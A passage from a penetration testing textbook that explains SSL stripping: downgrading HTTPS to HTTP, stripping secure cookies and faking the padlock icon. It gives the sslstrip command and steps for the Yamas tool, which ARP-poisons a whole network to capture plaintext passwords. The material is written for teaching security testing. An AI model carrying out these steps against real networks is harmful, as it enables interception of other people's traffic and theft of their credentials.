Ethical Hacking and Penetration Testing Guide
SSL Strip: Stripping HTTPS Traffic
Yüklə 22,44 Mb. Pdf görüntüsü
|
- Bu səhifədəki naviqasiya:
- SSL Strip: Stripping HTTPS Traffic
- Requirements
- Automating Man in the Middle Attacks
|
SSL Strip: Stripping HTTPS Traffic
So far, we have only discussed capturing the insecure http traffic, but not secure connections like https. For this, a tool called SSL strip really comes in handy. This tool is helpful even for websites that switch between https and http. The way it works is it replaces all the https links with http links and remembers the change. It also strips any secure cookie that it sees in the cookie field inside the http request. Secure cookies instruct the browser to only transmit it over https. In this way, we are also able to capture cookies. In order for the page look legit, it also replaces the favicon with the (padlock) icon so that the victim would think that he is on a secure connection. Requirements In order to run SSL Strip, we should have already implemented the ARP spoofing attack. You can do it with any of the tools we discussed earlier. Also make sure that port forwarding is enabled before performing the ARP spoofing attack. 158 ◾ Ethical Hacking and Penetration Testing Guide Usage The SSL strip can be found in the / pentest/web/ssltrip directory. Navigate to that direc- tory and execute the following command to get it running. root@bt:/pentest/web/ssltrip#./sslstrip.py –l 8080 The –l parameter instructs SSL strip to listen on port 8080. Whenever the victim logs in to his account, say, Facebook, his connection will be forced over http. Hence, we can easily use our favorite packet-capturing tool to capture all the traffic. Alternatively, we can also view the captured traffic inside the sslstrip.log folder, which is located inside the same folder in which the SSL strip is located. Just use your favorite text editor to open the log file. Automating Man in the Middle Attacks We have already talked about several tools that could be used to perform man in the middle attacks. The last tool we would talk about is Yamas, which was created to automate man in the middle attacks. It’s fairly simple and easy to use. Yamas utilizes arpspoof, ettercap, and sslstrip to do its task. With SSL strip, we have additional power to strip https requests. It’s not available inside of BackTrack by default. We can install it from the following link: http://comax.fr/yamas.php Usage Once you have downloaded and installed yamas, you just need to type “yamas” command from the terminal to launch it. Step 1 —After you have launched it, you would need to change the port number the traffic would be redirected from and the port number that the traffic would be redirected to. Just go with the default options 8080 and 80. Network Sniffing ◾ 159 Step 2 —Next, it will ask you to enter the output file. Just go with the default one. And then it will ask you for your default gateway and the interface that you would like to use. In my case, the default gateway is 192.168.15.1 and the interface is eth0. Step 3 —Next, it will ask you for the target host; by default, it will scan the whole network for valid hosts. Step 4 —That’s it. It will poison the whole network and open up a passwords window, where you will see the passwords that it captured. Once these steps are performed any plain text credential sent across the network will be captured. Yüklə 22,44 Mb. Dostları ilə paylaş:
|